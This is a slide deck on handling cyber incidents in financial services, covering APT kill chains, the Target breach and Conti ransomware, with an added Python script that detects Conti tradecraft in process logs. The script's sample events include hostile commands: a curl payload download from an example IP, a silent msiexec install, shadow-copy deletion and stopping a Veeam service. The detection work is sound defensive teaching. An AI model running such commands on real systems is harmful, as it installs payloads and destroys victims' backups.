Best Practices: Handling
Cyber Security Incidents in the Financial Services Sector (SJK)
Cyber Security Incident Management
Dr. Charles Lim, Msc., Bsc., CCSE, CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEI
Serpong, 18 August 2022
About Me
Dr. Charles Lim, Msc., CCSE, CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEI
Head of Cyber Security Laboratory and Security Operation Center
Researcher – Information Security Research Group and Lecturer
Swiss German University
Charles.lims [at] gmail.com and charles.lim [at] sgu.ac.id
http://people.sgu.ac.id/charleslim
Research Interest
• Malware
• Intrusion Detection
• Vulnerability Analysis
• Digital Forensics
• Cloud Security
Community
Indonesia Honeynet Project - Chapter Lead
Academy CSIRT – member
Asosiasi Forensik Digital Indonesia - member
About Swiss German University (SGU)
MOU SGU & BSSN | 24 November 2018 | Tangerang, Indonesia
Research collaboration: malware, threat intelligence
SGU Master of IT Program
ISIF Research Grant 2019, 2020, 2021
This research has 3 outcomes (SGU, BSSN and IHP collaboration):
1. A more robust repository platform for processing and storing a broader range of honeynet-based threat information
2. A highly available data lake platform that allows security analysts to perform threat correlation between honeynet threat information and existing OSINT.
3. Higher-quality threat information, including description, scoring and analysis report, generated automatically by the system with the help of a security analyst, allowing organizations to easily share and exchange security threat information with other organizations.
AGENDA
• Cyber Threats & Attacks
• Information Security
• Business Evolution
• Business Risk & Risk Management
• APT Attacks
• Case Studies
• Organizational Readiness
• Q & A
To competently perform rectifying security service,
two critical incident response elements are
necessary: information and organization.
—Robert E. Davis
Cyber Threats & Attacks
Cyber Attack Variants
Current Trends
Attack Surface
Cyber Threats 2022
Source: Gartner
Cyber Threat Map 2022 (by Industry)
https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/
Breach Discovery (Average): ~6 months
https://www.ibm.com/security/digital-assets/cost-data-breach-report/#/
Frequency of Ransomware Attacks
https://cybersecurityventures.com/ransomware-damage-report-2017-5-billion/
FBI Response
Information Security
Information Security
InfoSec, CompSec & Cyber Security
Security Threats, Risks & Strategy
• External threats
• Insider threats
• Risks & lines of defense (Transfer, Mitigate, Avoid, Accept)
• Corporate critical assets: intellectual property, revenue, reputation, etc.
• Strategy: Recover, Adapt & Reshape
Risk Equation
Risk = (Threats × Vulnerability × Asset Value) / Security Controls
Business Evolution
Evolution of Business
Data/Information is $$$$$
https://businessmodel.company/business-model-evolution/
Cyber Risk of Digital Transformation
• Free Internet services are the norm
• Users sacrifice personal privacy data for free services
• User profiles are "sold" to vendors so that better services can be provided to users
https://www.worldbank.org/en/publication/wdr2016
Digital Trends
• Digital transformation
• Cost effectiveness
• Customer experience
• Disruptive products and/or services
• Customer-facing experience
• Mobile devices
• Service process design
• Emerging technologies
Risk Management
Known/Unknown Risk - Business Risk
• Known risks: calculated business risks
• Unknown risks: un-calculated business risks
Risk Management
• Known risks → pro-active risk management
• Unknown risks → reactive risk management
https://www.wipro.com/capital-markets/cybersecurity-essentials-for-capital-markets-firms-in-the-digital-age/
Cyber Security Incident Management
Cyber Security Framework
Incident Response: DRP & BCP
http://www.metin-mitchell.com/how-to-mitigate-the-risks-of-cyber-security-through-contingency-planning/
Business Continuity Plan (BCP)
Activity sequence: Emergency response plan → Crisis management/communication plan → Business recovery plan → A successful outcome
Source: Malcolm Cornish FBCI - MARSH
APT Attacks
Characteristics of an Advanced Persistent Threat
Advanced
• A wide range of techniques is used, including development of custom malware
• The combination of techniques is tailored to the target
Persistent
• The implant stays in the system for a long period in order to achieve its objective
• The attack proceeds in stages until the system is fully taken over
Threats
• The threat is carried out by attackers who have the skills and the funding to take over the target system
• Combining various tools to attack automatically is the primary aim
APT Attacks
• Intent:
• From stealing intellectual property to disrupting systems
• Techniques used (target: employees):
• Social engineering
• Spear-phishing email
• Drive-by downloads via compromised/infiltrated websites
• Objective:
• Infect the target with malware that has a range of capabilities (tailored to the target)
• Gain access to one system → keep that access and reach the next systems (via lateral movement)
Stages of a Cyber Attack – Cyber Kill Chain
Recon     | Research on the target: profile and weaknesses of the system
Weaponize | Preparing the weapon: malware to exploit the system
Deliver   | Delivering the weapon: via USB, email, URL link and others
Exploit   | Exploiting the system: vulnerability of the target system
Install   | Installing the backdoor: for persistence in the system
C&C       | Communicating with C&C: to receive further instructions
Action    | Action on objectives: taking or destroying data
Intrusion Kill Chain
https://www.oreilly.com/library/view/practical-cyber-intelligence/9781788625562/37a5852b-ef31-4b1e-a184-93ea7cf5cd75.xhtml
Case Study I
Case Study – TARGET Data Breach (1/2)
• Used HVAC vendor credentials to get into the Target network, then performed reconnaissance to install malware.
• Sent the credit-card-stealing malware to the cashier machines; the security system detected the breach but failed to act.
• The malware collected all the credit cards onto 3 staging servers before sending them to Moscow.
• Credit card numbers were flowing out starting 2 Dec.
• Federal investigators warned Target on 12 Dec about the data breach.
• 15 Dec: Target confirmed the breach after 40 million credit card numbers had been stolen.
Case Study – TARGET Data Breach (2/2)
Mapped onto the kill chain (Recon → Weaponize → Deliver → Exploit → Install → C&C → Action):
• The attacker took advantage of a Target vendor weakness to penetrate Target's network.
• Target missed warnings from its anti-intrusion software → malware installed.
• The attacker took advantage of weak control of the Target network → the attacker moved into other parts of the network.
• Target missed information from its anti-intrusion software → millions of credit card numbers stolen.
Case Study II: Ransomware
Ransomware
Ransomware – a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid.
Ransomware Family - Evolution
Ransomware – How it works
Profiling Conti Ransomware
• First seen: 2020
• Malware Name: Conti Ransomware
• Infection Method: Email phishing (PDF via Google Doc link)
• Malware Type: Trojan
• Goal: Create backdoor
• Threat Actor: Wizard Spider (Russian cybercrime)
• Target: Windows domain
• Tools: Meterpreter, Cobalt Strike, PowerShell Empire, AdFind
• Capability: Persistence, lateral movement, backup removal (Veeam software)
• Impact:
• Stealing credentials
• Private/confidential information exposed
Conti Ransomware - Countermeasures
• Early stage → employee training (email security)
• Tracking externally exposed endpoints is critical.
• To prevent lateral movement:
• Network segregation
• Windows domain segmentation
• Audit and/or block command-line interpreters
• AppLocker or Software Restriction Policies → catch suspicious "curl" commands and unauthorized ".msi" installer scripts
• Data exfiltration → proper logging of process execution with command-line arguments.
• Data backup
• Special security protocols → preventing Veeam account takeover.
• 3-2-1 rule: 3 copies of the data, on 2 different media, with 1 copy at a different location
• 24x7 Security Operation Center → monitor key signals
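The bullets above assume that process execution is logged with command-line arguments and that someone reviews those logs for the Conti tradecraft named on the profile slide. The following is an added example (not code from the original deck or from any vendor product) of a minimal triage pass over such telemetry: it parses an assumed simplified key=value export of Windows Security Event ID 4688 records, flags living-off-the-land downloads (curl and similar), msiexec installs from user-writable paths, and shadow-copy/Veeam tampering, then links a download and a later install on the same host in kill-chain terms (Deliver → Install). The event lines, host names, user names and the IP address are constructed samples; the service name pattern and rule thresholds are assumptions to tune against your own environment.

```python
"""Triage of Windows process-creation telemetry (Security Event ID 4688 with
command-line auditing enabled) for the behaviours named on the Conti
countermeasure slide: living-off-the-land downloads, .msi installs from
user-writable paths, and backup/shadow-copy tampering.
Added example, not code from the original deck. The events below are
constructed samples in an assumed simplified key=value export format."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample events; one 4688-style record per line (assumed format).
SAMPLE_EVENTS = """\
ts=2022-08-18T09:01:12 host=WS-014 user=CORP\\jdoe parent=outlook.exe cmd=C:\\Windows\\System32\\curl.exe -o C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv.msi http://203.0.113.7/inv.msi
ts=2022-08-18T09:01:20 host=WS-014 user=CORP\\jdoe parent=cmd.exe cmd=msiexec.exe /i C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv.msi /qn
ts=2022-08-18T09:15:03 host=WS-014 user=CORP\\jdoe parent=explorer.exe cmd=msiexec.exe /i C:\\Program Files\\Vendor\\setup.msi /qn
ts=2022-08-18T11:40:55 host=BKP-01 user=CORP\\svc_veeam parent=powershell.exe cmd=vssadmin.exe delete shadows /all /quiet
ts=2022-08-18T11:41:10 host=BKP-01 user=CORP\\svc_veeam parent=cmd.exe cmd=net stop VeeamBackupSvc
ts=2022-08-18T12:00:00 host=WS-020 user=CORP\\asmith parent=explorer.exe cmd=notepad.exe C:\\Users\\asmith\\notes.txt
"""

EVENT_RE = re.compile(
    r"^ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)

# Rule name -> pattern over the full command line (case-insensitive).
RULES = {
    # Built-in download tools fetching a payload over HTTP(S)
    "download-tool": re.compile(
        r"\b(curl|bitsadmin|certutil)(\.exe)?\b.*https?://", re.I),
    # msiexec installing a package from a user-writable location
    "unauthorized-msi": re.compile(
        r"\bmsiexec(\.exe)?\b.*\\(Users|Temp|AppData)\\.*\.msi", re.I),
    # Shadow-copy deletion or stopping a Veeam service ahead of encryption
    # (assumed service-name prefix; adjust to the backup product in use)
    "backup-tamper": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wbadmin(\.exe)?\s+delete"
        r"|net(\.exe)?\s+stop\s+veeam", re.I),
}


@dataclass(frozen=True)
class Event:
    ts: str
    host: str
    user: str
    parent: str
    cmd: str


@dataclass(frozen=True)
class Finding:
    rule: str
    event: Event


def parse_events(text: str) -> List[Event]:
    """Parse key=value records; malformed lines are skipped, not guessed at."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(Event(**m.groupdict()))
    return events


def triage(events: List[Event]) -> List[Finding]:
    """Apply every rule to every event's command line, in event order."""
    return [Finding(rule, ev) for ev in events
            for rule, pat in RULES.items() if pat.search(ev.cmd)]


def correlate(findings: List[Finding]) -> List[Tuple[str, str, str]]:
    """Link a download on a host to a later unauthorized .msi install on the
    same host (Deliver -> Install). Returns (host, download_ts, install_ts);
    ISO-8601 timestamps compare correctly as strings."""
    downloads = [f for f in findings if f.rule == "download-tool"]
    installs = [f for f in findings if f.rule == "unauthorized-msi"]
    return [(d.event.host, d.event.ts, i.event.ts)
            for d in downloads for i in installs
            if i.event.host == d.event.host and i.event.ts >= d.event.ts]


if __name__ == "__main__":
    found = triage(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f.event.ts} {f.event.host} {f.rule:17} {f.event.cmd}")
    for host, t0, t1 in correlate(found):
        print(f"CHAIN {host}: download at {t0} followed by install at {t1}")
```

On the sample data the vendor installer from Program Files and the notepad launch are not flagged, while the curl-then-msiexec pair on WS-014 is reported as one chain; the two backup-tampering events on BKP-01 are the signals the "preventing Veeam account takeover" bullet is meant to catch before encryption starts.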
Organizational Readiness (1/2)
• Always back up your data
• Don't click links or attachments in suspicious emails
• Browse and download only from trusted sites
• Always use genuine software and update it regularly
• Use secure channels
• Continuous monitoring
Organizational Readiness (2/2)
• Core pillars of cyber security: People, Process and Technology
• Incident management focuses on risk-based governance and on strengthening collaboration between academics, business, government and community (ABGC)
• Personal data protection becomes essential when data is the most valuable element in every aspect of electronic transactions
• Business, operations and technology will keep evolving; the organization MUST always be ready to change → agile
Are you ready?
"If You Fail to Plan, You Are Planning to Fail"
Benjamin Franklin
Q & A